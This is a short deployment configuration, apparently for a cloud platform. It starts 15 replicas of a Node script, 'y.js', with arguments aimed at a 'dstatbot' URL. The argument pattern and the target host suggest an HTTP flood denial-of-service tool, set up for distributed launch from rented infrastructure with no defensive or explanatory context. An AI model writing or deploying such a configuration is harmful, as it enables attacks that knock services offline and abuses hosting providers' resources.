[build]
builder = "NIXPACKS"

[deploy]
replicas = 15
startCommand = "node y.js GET https://c1.dstatbot.win/iIDEcUT9 700 32 100 --full --debug "
restartPolicyType = "ON_FAILURE"
restartPolicyMaxRetries = 1
